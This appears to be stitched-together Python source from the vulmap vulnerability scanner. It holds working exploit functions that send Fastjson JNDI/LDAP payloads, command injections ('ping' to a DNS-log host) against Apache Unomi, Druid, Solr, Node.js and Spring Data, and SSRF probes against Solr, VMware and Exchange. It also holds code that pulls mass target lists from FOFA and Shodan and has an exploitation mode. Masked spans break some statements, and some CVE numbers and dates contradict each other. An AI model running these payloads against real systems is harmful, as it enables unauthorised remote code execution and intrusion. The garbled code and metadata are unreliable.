def fastjson_1224_poc(self):
self.threadLock.acquire()
self.vul_info["prt_name"] = "Fastjson: 1.2.24"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_payd"] = "null"
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_name"] = "Fastjson 反序列化远程代码执行漏洞"
self.vul_info["vul_numb"] = "CVE-2017-18349"
self.vul_info["vul_apps"] = "Fastjson"
self.vul_info["vul_date"] = "2017-03-15"
self.vul_info["vul_vers"] = "<= 1.2.24"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "远程代码执行"
self.vul_info["vul_data"] = "null"
self.vul_info[
"vul_desc"] = "Fastjson中的parseObject允许远程攻击者通过精心制作的JSON请求执行任意代码"
self.vul_info["cre_date"] = "2021-01-20"
self.vul_info["cre_auth"] = "zhzyker"
headers = {
'User-Agent': self.ua,
'Content-Type': "application/json",
'Connection': 'close'
}
md = dns_request()
dns = md
data = {
"b": {
"@type": "com.sun.rowset.JdbcRowSetImpl",
"dataSourceName": "ldap://" + dns + "//Exploit",
"autoCommit": True
}
}
data = json.dumps(data)
try:
try:
request = requests.post(self.url,
data=data,
headers=headers,
timeout=self.timeout,
verify=False)
self.vul_info["vul_data"] = dump.dump_all(request).decode(
'utf-8', 'ignore')
except:
pass
if dns_result(md):
self.vul_info["vul_payd"] = "ldap://" + dns + "//Exploit] "
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info[
"prt_info"] = "[dns] [payload: ldap://" + dns + "//Exploit] "
verify.scan_print(self.vul_info)
else:
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception as e:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
def fastjson(self, webapps_identify, url):
name = "Fastjson"
Identify.identify_prt(name)
dns = dns_request()
payload1 = '{"e":{"@type":"java.net.Inet4Address","val":"%s"}}' %dns
payload2 = '{"@type":"java.net.Inet4Address","val":"%s"}' %dns
payload3 = '{{"@type":"java.net.URL","val":"http://%s"}:"x"}' %dns
payload4 = '{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"%s"}}""}' %dns
payload5 = '{"a":"'
headers = {'User-Agent': self.ua, 'Content-Type': "application/json", 'Connection': 'close'}
try:
try:
request = requests.post(url, data=payload5, headers=headers, timeout=self.timeout, verify=False)
except:
pass
if r"nested exception is com.alibaba.fastjson.JSONException:" in request.text:
if r"application/json" == request.headers['Content-Type']:
webapps_identify.append("fastjson")
elif r"application/json" in request.headers['Content-Type']:
webapps_identify.append("fastjson")
else:
requests.post(url, data=payload1, headers=headers, timeout=self.timeout, verify=False)
requests.post(url, data=payload2, headers=headers, timeout=self.timeout, verify=False)
requests.post(url, data=payload3, headers=headers, timeout=self.timeout, verify=False)
requests.post(url, data=payload4, headers=headers, timeout=self.timeout, verify=False)
if dns_result(dns):
webapps_identify.append("fastjson")
webapps_identify.append("fastjson [" + dns + "]")
except Exception as error:
pass
def cve_2020_13942_poc(self):
self.threadLock.acquire()
self.vul_info["prt_name"] = "Apache Unomi: CVE-2020-13942"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_payd"] = self.payload_cve_2020_13942.replace(
"RECOMMAND", "whoami")
self.vul_info["vul_name"] = "Apache Unomi remote code execution"
self.vul_info["vul_numb"] = "CVE-2020-13942"
self.vul_info["vul_apps"] = "Unomi"
self.vul_info["vul_date"] = "2020-11-23"
self.vul_info["vul_vers"] = "< 1.5.2"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "远程代码执行"
self.vul_info["vul_data"] = "null"
self.vul_info["vul_desc"] = "攻击者可以通过精心构造的MVEL或ONGl表达式来发送恶意请求,使得Unomi服务器执行任意代码," \
"漏洞对应编号为CVE-2020-11975,而CVE-2020-13942漏洞是对CVE-2020-11975漏洞的补丁绕过," \
"攻击者绕过补丁检测的黑名单,发送恶意请求,在服务器执行任意代码。"
self.vul_info["cre_date"] = "2021-01-28"
self.vul_info["cre_auth"] = "zhzyker"
md = dns_request()
cmd = "ping " + md
self.payload = self.payload_cve_2020_13942.replace("RECOMMAND", cmd)
self.headers = {
'User-Agent': self.ua,
'Accept': '*/*',
'Connection': 'close',
'Content-Type': 'application/json'
}
try:
req = requests.post(self.url + "/context.json",
data=self.payload,
headers=self.headers,
timeout=self.timeout,
verify=False)
if dns_result(md):
self.vul_info["vul_data"] = dump.dump_all(req).decode(
'utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info["prt_info"] = "[dns] [cmd:" + cmd + "]"
else:
rep = list(
json.loads(req.text)
["trackedConditions"])[0]["parameterValues"]["pagePath"]
if r"/tracker/" in rep:
self.vul_info["vul_data"] = dump.dump_all(req).decode(
'utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoC_MaYbE"
self.vul_info["prt_info"] = "[maybe]"
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception as error:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
def cve_2021_27905_poc(self):
self.threadLock.acquire()
self.vul_info["prt_name"] = "Apache Solr: CVE-2021-27905"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_payd"] = "null"
self.vul_info["vul_name"] = "Apache Solr Replication handler SSRF"
self.vul_info["vul_numb"] = "CVE-2021-27905"
self.vul_info["vul_apps"] = "Solr"
self.vul_info["vul_date"] = "2021-04-14"
self.vul_info["vul_vers"] = "7.0.0-7.7.3, 8.0.0-8.8.1"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "SSRF"
self.vul_info["vul_data"] = "null"
self.vul_info[
"vul_desc"] = "Apache Solr是一个开源搜索服务引擎,Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。漏洞产生在 ReplicationHandler 中的 masterUrl 参数( leaderUrl 参数)可指派另一个 Solr 核心上的 ReplicationHandler 讲索引数据复制到本地核心上。成功利用此漏洞可造成服务端请求伪造漏洞。"
self.vul_info["cre_auth"] = "zhzyker"
core_name = None
dns = dns_request()
url_core = self.url + "/solr/admin/cores?indexInfo=false&wt=json"
try:
request = requests.get(url_core,
headers=self.headers,
timeout=self.timeout,
verify=False)
try:
core_name = list(json.loads(request.text)["status"])[0]
except:
pass
payload = "/solr/re_core_name/replication?command=fetchindex&masterUrl" \
"=http://re_dns_domain/&wt=json&httpBasicAuthUser="******"&httpBasicAuthPassword="******"re_core_name", core_name).replace("re_dns_domain", dns)
url_ssrf = urljoin(self.url, payload)
r = requests.get(url_ssrf,
headers=self.headers,
timeout=self.timeout,
verify=False)
if dns in dns_result(dns):
self.vul_info["vul_payd"] = url_ssrf
self.vul_info["vul_data"] = dump.dump_all(r).decode(
'utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info[
"prt_info"] = "[ssrf] [dns] [corename: " + self.url + "/solr/" + core_name + " ]"
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception as e:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
def fastjson_1262_poc(self):
self.threadLock.acquire()
self.vul_info["prt_name"] = "Fastjson: 1.2.62"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_payd"] = "null"
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_name"] = "Fastjson 反序列化远程代码执行漏洞"
self.vul_info["vul_numb"] = "null"
self.vul_info["vul_apps"] = "Fastjson"
self.vul_info["vul_date"] = "2019-10-07"
self.vul_info["vul_vers"] = "<= 1.2.62"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "远程代码执行"
self.vul_info["vul_data"] = "null"
self.vul_info["vul_desc"] = "官方暂未发布针对此漏洞的修复版本,开启了autoType功能的受影响用户可通过关闭autoType来规避风险" \
"(autoType功能默认关闭),另建议将JDK升级到最新版本。"
self.vul_info["cre_date"] = "2021-01-21"
self.vul_info["cre_auth"] = "zhzyker"
headers = {'User-Agent': self.ua, 'Content-Type': "application/json"}
md = dns_request()
dns = md
data = {
"@type": "org.apache.xbean.propertyeditor.JndiConverter",
"AsText": "ldap://" + dns + "//exploit"
}
data = json.dumps(data)
try:
try:
request = requests.post(self.url,
data=data,
headers=headers,
timeout=self.timeout,
verify=False)
self.vul_info["vul_data"] = dump.dump_all(request).decode(
'utf-8', 'ignore')
except:
pass
if dns_result(md):
self.vul_info["vul_payd"] = "ldap://" + dns + "//Exploit] "
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info[
"prt_info"] = "[dns] [payload: ldap://" + dns + "//Exploit] "
verify.scan_print(self.vul_info)
else:
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception as e:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
def cve_2021_25646_poc(self):
self.threadLock.acquire()
self.vul_info["prt_name"] = "Apache Druid: CVE-2021-25646"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_payd"] = "null"
self.vul_info["vul_name"] = "Apache Druid 远程代码执行漏洞"
self.vul_info["vul_numb"] = "CVE-2021-25646"
self.vul_info["vul_apps"] = "Druid"
self.vul_info["vul_date"] = "2021-02-01"
self.vul_info["vul_vers"] = "< 0.20.1"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "远程代码执行漏洞"
self.vul_info["vul_data"] = "null"
self.vul_info["vul_desc"] = "Apache Druid包括执行用户提供的JavaScript的功能嵌入在各种类型请求中的代码。" \
"此功能在用于高信任度环境中,默认已被禁用。但是,在Druid 0.20.0及更低版本中," \
"经过身份验证的用户发送恶意请求,利用Apache Druid漏洞可以执行任意代码。" \
"攻击者可直接构造恶意请求执行任意代码,控制服务器。"
self.vul_info["cre_date"] = "2021-02-03"
self.vul_info["cre_auth"] = "zhzyker"
url = urljoin(self.url, "/druid/indexer/v1/sampler")
headers = {
'Content-Type': 'application/json',
'User-Agent': self.ua,
'Accept': 'text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2',
'Connection': 'keep-alive'
}
md = dns_request()
cmd = "ping " + md
data = self.payload_cve_2021_25646.replace("RECOMMAND", cmd)
try:
request = requests.post(url,
data=data,
headers=headers,
timeout=self.timeout,
verify=False)
if dns_result(md):
self.vul_info["vul_data"] = dump.dump_all(request).decode(
'utf-8', 'ignore')
self.vul_info["vul_payd"] = data
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info["prt_info"] = "[dns] [rce] [cmd: " + cmd + "]"
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception as e:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
def cve_2021_21975_poc(self):
self.threadLock.acquire()
self.vul_info[
"prt_name"] = "VMware vRealize Operations Manager: CVE-2021-21975"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_payd"] = "null"
self.vul_info[
"vul_name"] = "VMware vRealize Operations Manager API SSRF"
self.vul_info["vul_numb"] = "CVE-2021-21972"
self.vul_info["vul_apps"] = "Vmware"
self.vul_info["vul_date"] = "2021-03-31"
self.vul_info["vul_vers"] = "<= 8.3.0"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "SSRF"
self.vul_info["vul_data"] = "null"
self.vul_info[
"vul_desc"] = "攻击者通过访问vRealize Operations Manager API传递特定的参数到服务器端进行请求伪造攻击"
self.vul_info["cre_date"] = "2021-04-01"
self.vul_info["cre_auth"] = "zhzyker"
try:
headers = {
"User-Agent": self.ua,
"Content-Type": "application/json;charset=UTF-8"
}
dns = dns_request()
data = '["' + dns + '"]'
url = urljoin(self.url, "/casa/nodes/thumbprints")
res = requests.post(url,
data=data,
headers=headers,
timeout=self.timeout,
verify=False)
if dns_result(dns):
self.vul_info["vul_data"] = dump.dump_all(res).decode(
'utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info["vul_payd"] = data
self.vul_info["prt_info"] = "[ssrf] [dns:" + dns + " ]"
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception as error:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
def cve_2021_21315_poc(self):
self.threadLock.acquire()
self.vul_info["prt_name"] = "Node.JS: CVE-2021-21315"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_payd"] = "null"
self.vul_info["vul_name"] = "Node.JS Command Injection"
self.vul_info["vul_numb"] = "CVE-2021-21315"
self.vul_info["vul_apps"] = "Node.JS"
self.vul_info["vul_date"] = "2021-02-25"
self.vul_info["vul_vers"] = "Systeminformation < 5.3.1"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "Command Injection"
self.vul_info["vul_data"] = "null"
self.vul_info["vul_desc"] = "CVE-2021-21315 Node.JS OS sanitize service Parameters Command Injection"
self.vul_info["cre_date"] = "2021-03-04"
self.vul_info["cre_auth"] = "zhzyker"
headers = {
"User-agent": self.ua,
"Connection": "close"
}
md = dns_request()
cmd = "ping%20" + md
payload = "/api/getServices?name[]=$(RECOMMAND)".replace("RECOMMAND", cmd)
url = self.url + payload
try:
try:
req = requests.get(url, headers=headers, timeout=3, verify=False)
r = dump.dump_all(req).decode('utf-8', 'ignore')
except:
r = "null"
pass
if dns_result(md):
self.vul_info["vul_data"] = r
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info["vul_payd"] = payload
self.vul_info["prt_info"] = "[dns] [payload:" + url + " ]"
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception as error:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
def cve_2018_1273_poc(self):
self.threadLock.acquire()
self.vul_info["prt_name"] = "Spring Data: CVE-2018-1273"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_payd"] = "null"
self.vul_info["vul_name"] = "Spring Data Commons 远程命令执行漏洞"
self.vul_info["vul_numb"] = "CVE-2018-1273"
self.vul_info["vul_apps"] = "Spring"
self.vul_info["vul_date"] = "2018-04-11"
self.vul_info["vul_vers"] = "1.13 - 1.13.10, 2.0 - 2.0.5"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "远程命令执行漏洞"
self.vul_info["vul_data"] = "null"
self.vul_info["vul_desc"] = "Spring Data Commons组件中存在远程代码执行漏洞," \
"攻击者可构造包含有恶意代码的SPEL表达式实现远程代码攻击,直接获取服务器控制权限。"
self.vul_info["cre_date"] = "2021-01-26"
self.vul_info["cre_auth"] = "zhzyker"
md = dns_request()
cmd = "ping " + md
payload = 'username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("' + cmd + '")]=&password=&repeatedPassword='******'utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info["vul_payd"] = payload
self.vul_info["prt_info"] = "[dns] [rce] [payload: " + payload + " ]"
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception as e:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
def control_options(args): # 选项控制,用于处理所有选项
delay = globals.get_value("DELAY") # 获取全局变量延时时间DELAY
now_warn = now.timed(de=delay) + color.red_warn()
if args.socks:
proxy_set(args.socks, "socks") # proxy support socks5 http https
elif args.http:
proxy_set(args.http, "http") # proxy support socks5 http https
if args.list is False: # 判断是否显示漏洞列表
print(now.timed(de=0) + color.yel_info() + color.yellow(" List of supported vulnerabilities"))
print(vul_list())
if args.thread_num != 10: # 判断是否为默认线程
print(now.timed(de=0) + color.yel_info() + color.yellow(" Custom thread number: " + str(args.thread_num)))
if args.vul is not None: # 判断是否-v进行漏洞利用
args.mode = "exp" # 若进行漏洞利用修改模式为exp
if args.debug is False: # 判断是否开启--debug功能
print(now.timed(de=delay) + color.yel_info() + color.yellow(" Using debug mode to echo debug information"))
globals.set_value("DEBUG", "debug") # 设置全局变量DEBUG
#ceye_api() # 测试ceye连接性
if dns_request(): # 初始化dnslog, 并判断是否可用
pass
else:
print(now_warn + color.red(" Dnslog platform (hyuga.co dnslog.cn ceye.io) is not available"))
if args.O_TEXT: # 判断是否text输出
if os.path.isfile(args.O_TEXT): # 判断text输出文件是否冲突
print(now.timed(de=delay) + color.red_warn() + color.red(" The json file: [" + args.O_TEXT + "] already exists"))
exit(0)
if args.O_JSON: # 判断是否json输出
if os.path.isfile(args.O_JSON): # 判断json输出文件是否冲突
print(now.timed(de=delay) + color.red_warn() + color.red(" The json file: [" + args.O_JSON + "] already exists"))
exit(0)
if args.mode is None or args.mode == "poc": # 判断是否进入poc模式
if args.url is not None and args.file is None: # 判断是否为仅-u扫描单个URL
args.url = url_check(args.url) # 处理url格式
if survival_check(args.url) == "f": # 检查目标存活状态
print(now.timed(de=0) + color.red_warn() + color.red(" Survival check failed: " + args.url))
exit(0) # 单个url时存活失败就退出
print(now.timed(de=0) + color.yel_info() + color.cyan(" Start scanning target: " + args.url))
if args.app is None: # 判断是否扫描扫描全部webapps
globals.set_value("RUNALLPOC", True) # 扫描单个URL并且所有webapps时RUNALLPOC=True
core.control_webapps("url", args.url, args.app, "poc")
else: # 否则扫描单个webapps
core.control_webapps("url", args.url, args.app, "poc")
elif args.file is not None and args.url is None: # 判断是否为仅-f批量扫描文件
if os.path.isfile(args.file): # 判断批量目标文件是否存在
print(now.timed(de=0) + color.yel_info() + color.cyan(" Start batch scanning target: " + args.file))
else: # 没有文件错误并退出
print(now.timed(de=0) + color.red_warn() + color.red(" Not found target file: " + args.file))
exit(0)
if args.app is None: # 判断是否扫描扫描全部webapps
globals.set_value("RUNALLPOC", "FILE") # 批量扫描URL并且所有webapps时RUNALLPOC="FILE"
core.control_webapps("file", args.file, args.app, "poc")
else: # 否则批量扫描单个webapps
core.control_webapps("file", args.file, args.app, "poc")
elif args.url is None and args.file is None and args.fofa is not None: # 调用fofa api
print(now.timed(de=0) + color.yel_info() + color.yellow(" Use fofa api to search [" + args.fofa + "] and start scanning"))
if r"xxxxxx" in globals.get_value("fofa_key"): # 使用fofa api之前判断fofa信息是否正确
print(now.timed(de=0) + color.red_warn() + color.red(" Check fofa email is xxxxxx Please replace key and email"))
print(now.timed(de=0) + color.red_warn() + color.red(" Go to https://fofa.so/user/users/info find key and email"))
print(now.timed(de=0) + color.red_warn() + color.red(" How to use key and email reference https://github.com/zhzyker/vulmap"))
exit(0)
else:
print(now.timed(de=0) + color.yel_info() + color.yellow(" Fofa email: " + globals.get_value("fofa_email")))
print(now.timed(de=0) + color.yel_info() + color.yellow(" Fofa key: " + globals.get_value("fofa_key")))
fofa_list = fofa(args.fofa, args.size) # 调用fofa api拿到目标数组默认100个
if args.app is None: # 判断是否扫描扫描全部webapps
core.control_webapps("fofa", fofa_list, args.app, "poc")
else:
core.control_webapps("fofa", fofa_list, args.app, "poc")
elif args.url is None and args.file is None and args.shodan is not None: # 调用fofa api 或者 shodan api
print(now.timed(de=0) + color.yel_info() + color.yellow(" Use shodan api to search [" + args.shodan + "] and start scanning"))
if r"xxxxxx" in globals.get_value("shodan_key"): # 使用shodan api之前判断shodan信息是否正确
print(now.timed(de=0) + color.red_warn() + color.red(" Check shodan key is xxxxxx Please replace key"))
print(now.timed(de=0) + color.red_warn() + color.red(" Go to https://account.shodan.io/ find key"))
print(now.timed(de=0) + color.red_warn() + color.red(" How to use key reference https://github.com/zhzyker/vulmap"))
exit(0)
else:
print(now.timed(de=0) + color.yel_info() + color.yellow(" Shodan key: " + globals.get_value("shodan_key")))
shodan_list = shodan_api(args.shodan) # 调用shodan api拿到目标数组默认100个
if args.app is None: # 判断是否扫描扫描全部webapps
core.control_webapps("shodan", shodan_list, args.app, "poc")
else:
core.control_webapps("shodan", shodan_list, args.app, "poc")
if args.O_TEXT:
print(now.timed(de=delay) + color.yel_info() + color.cyan(" Scan result text saved to: " + args.O_TEXT))
if args.O_JSON:
print(now.timed(de=delay) + color.yel_info() + color.cyan(" Scan result json saved to: " + args.O_JSON))
elif args.mode == "exp": # 漏洞利用模式参数较少
if args.vul is not None and args.url is not None: # 判断是否进入漏洞利用模式
core.control_webapps("url", args.url, args.vul, "exp")
else:
print(now_warn + color.red(" Options error, -v must specify -u"))
else:
print(now_warn + color.red(" Options error ... ..."))
def cve_2017_12629_poc(self):
self.threadLock.acquire()
http.client.HTTPConnection._http_vsn_str = 'HTTP/1.0'
self.vul_info["prt_name"] = "Apache Solr: CVE-2017-12629"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_payd"] = self.payload_cve_2017_12629.replace(
"RECOMMAND", "whoami")
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_name"] = "Apache Solr 远程代码执行漏洞"
self.vul_info["vul_numb"] = "CVE-2017-12629"
self.vul_info["vul_apps"] = "Solr"
self.vul_info["vul_date"] = "2017-10-14"
self.vul_info["vul_vers"] = "< 7.1.0"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "Remote Code Execution"
self.vul_info["vul_data"] = "null"
self.vul_info["vul_desc"] = "Apache Solr 是Apache开发的一个开源的基于Lucene的全文搜索服务器。其集合的配置方法" \
"(config路径)可以增加和修改监听器,通过RunExecutableListener执行任意系统命令。"
self.vul_info["cre_auth"] = "zhzyker"
core_name = "null"
new_core = random_md5()
md = dns_request()
cmd = "ping " + md
payload1 = self.payload_cve_2017_12629.replace(
"RECOMMAND", cmd).replace("new_core", new_core)
payload2 = '[{"id": "test"}]'
url_core = self.url + "/solr/admin/cores?indexInfo=false&wt=json"
headers_solr1 = {
'Accept': "*/*",
'User-Agent': self.ua,
'Content-Type': "application/json"
}
headers_solr2 = {
'Host': "localhost",
'Accept-Language': "en",
'User-Agent': self.ua,
'Connection': "close",
'Content-Type': "application/json"
}
try:
request = requests.get(url_core,
headers=headers_solr1,
timeout=self.timeout,
verify=False)
try:
core_name = list(json.loads(request.text)["status"])[0]
except:
pass
req = requests.post(self.url + "/solr/" + str(core_name) +
"/config",
data=payload1,
headers=headers_solr1,
timeout=self.timeout,
verify=False)
if dns_result(md):
self.vul_info["vul_data"] = dump.dump_all(req).decode(
'utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info[
"prt_info"] = "[dns] [newcore: " + new_core + "] "
else:
if request.status_code == 200 and core_name != "null" and core_name is not None:
self.vul_info["vul_data"] = dump.dump_all(req).decode(
'utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoC_MaYbE"
self.vul_info[
"prt_info"] = "[maybe] [newcore: " + new_core + "] "
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
def cve_2019_17558_poc(self):
self.threadLock.acquire()
self.vul_info["prt_name"] = "Apache Solr: CVE-2019-17558"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_payd"] = self.payload_cve_2019_17558.replace(
"RECOMMAND", "whoami")
self.vul_info[
"vul_name"] = "Apache Solr Velocity template Remote Code Execution"
self.vul_info["vul_numb"] = "CVE-2019-17558"
self.vul_info["vul_apps"] = "Solr"
self.vul_info["vul_date"] = "2017-10-16"
self.vul_info["vul_vers"] = "5.0.0 - 8.3.1"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "Remote Code Execution"
self.vul_info["vul_data"] = "null"
self.vul_info["vul_desc"] = "用户可以注入自定义模板,通过Velocity模板语言执行任意命令。"
self.vul_info["cre_auth"] = "zhzyker"
core_name = None
md = dns_request()
cmd = "ping " + md
payload_2 = self.payload_cve_2019_17558.replace("RECOMMAND", cmd)
url_core = self.url + "/solr/admin/cores?indexInfo=false&wt=json"
try:
request = requests.get(url_core,
headers=self.headers,
timeout=self.timeout,
verify=False)
try:
core_name = list(json.loads(request.text)["status"])[0]
except:
pass
url_api = self.url + "/solr/" + str(core_name) + "/config"
headers_json = {
'Content-Type': 'application/json',
'User-Agent': self.ua
}
set_api_data = """
{
"update-queryresponsewriter": {
"startup": "lazy",
"name": "velocity",
"class": "solr.VelocityResponseWriter",
"template.base.dir": "",
"solr.resource.loader.enabled": "true",
"params.resource.loader.enabled": "true"
}
}
"""
try:
r = requests.post(url_api,
data=set_api_data,
headers=headers_json,
timeout=self.timeout,
verify=False)
req = requests.get(self.url + "/solr/" + str(core_name) +
payload_2,
headers=self.headers,
timeout=self.timeout,
verify=False)
req = dump.dump_all(req).decode('utf-8', 'ignore')
r = dump.dump_all(r).decode('utf-8', 'ignore')
except:
req = "timeout"
r = "timeout"
if dns_result(md):
self.vul_info["vul_data"] = req
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info[
"prt_info"] = "[dns] [corename: " + self.url + "/solr/" + core_name + " ]"
verify.scan_print(self.vul_info)
elif self.vul_info[
"prt_resu"] != "PoCSuCCeSS" and core_name is not None:
self.vul_info["vul_data"] = r
self.vul_info["prt_resu"] = "PoC_MaYbE"
self.vul_info[
"prt_info"] = "[maybe] [corename: " + self.url + "/solr/" + core_name + " ]"
verify.scan_print(self.vul_info)
else:
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception as e:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
def cve_2021_26855_poc(self):
self.threadLock.acquire()
self.vul_info["prt_name"] = "Microsoft Exchange: CVE-2021-26855"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_payd"] = "null"
self.vul_info["vul_name"] = "Microsoft Exchange Server SSRF"
self.vul_info["vul_numb"] = "CVE-2021-26855"
self.vul_info["vul_apps"] = "Exchange"
self.vul_info["vul_date"] = "2021-03-03"
self.vul_info["vul_vers"] = "Exchange Server 2010 2013 2016 2019"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "SSRF"
self.vul_info["vul_data"] = "null"
self.vul_info[
"vul_desc"] = "Exchange 中身份验证后的任意文件写入漏洞。攻击者可以通过 Exchange 服务器进行身份验证,同时可以利用漏洞将文件写入服务器上的任何路径。也可以通过利用 CVE-2021-26855 SSRF 漏洞或通过破坏合法管理员的凭据来进行身份验证。"
self.vul_info["cre_date"] = "2021-03-07"
self.vul_info["cre_auth"] = "zhzyker"
url = self.url + "/owa/auth/x.js"
dns = dns_request()
cookie_local = "X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;"
cookie_dns = "X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;".replace(
"localhost", dns)
try:
headers = {
"User-agent": self.ua,
"Cookie": cookie_dns,
"Connection": "close"
}
res = requests.get(url,
headers=headers,
timeout=self.timeout,
verify=False)
if dns_result(dns):
self.vul_info["vul_data"] = dump.dump_all(res).decode(
'utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info["vul_payd"] = headers["Cookie"]
self.vul_info["prt_info"] = "[ssrf] [dns] [cookie: " + headers[
"Cookie"] + "]"
else:
headers = {
"User-agent": self.ua,
"Cookie": cookie_local,
"Connection": "close"
}
res = requests.get(url,
headers=headers,
timeout=self.timeout,
verify=False)
if res.status_code == 500 and "NegotiateSecurityContext failed with for host" in res.text:
if r"TargetUnknown" in res.text and r"localhost" in res.text:
self.vul_info["vul_data"] = dump.dump_all(res).decode(
'utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoC_MaYbE"
self.vul_info["vul_payd"] = headers["Cookie"]
self.vul_info[
"prt_info"] = "[ssrf] [maybe] [cookie: " + headers[
"Cookie"] + "]"
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception as error:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
